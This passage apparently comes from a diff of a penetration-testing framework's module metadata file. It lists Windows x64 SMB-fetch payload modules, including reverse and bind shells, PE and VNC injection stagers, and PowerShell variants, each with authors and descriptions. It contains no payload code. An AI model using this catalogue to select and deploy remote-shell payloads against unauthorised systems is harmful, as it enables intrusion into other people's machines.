"ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": 
"windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/peinject/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": { + "name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + 
"URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": 
"windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/pingback_reverse_tcp": { + "name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_bind_tcp": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_reverse_tcp": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" 
+ ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": { + "name": "SMB Fetch", + "fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/shell/bind_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows 
x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + 
"payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": 
"payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell_bind_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/shell_reverse_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": 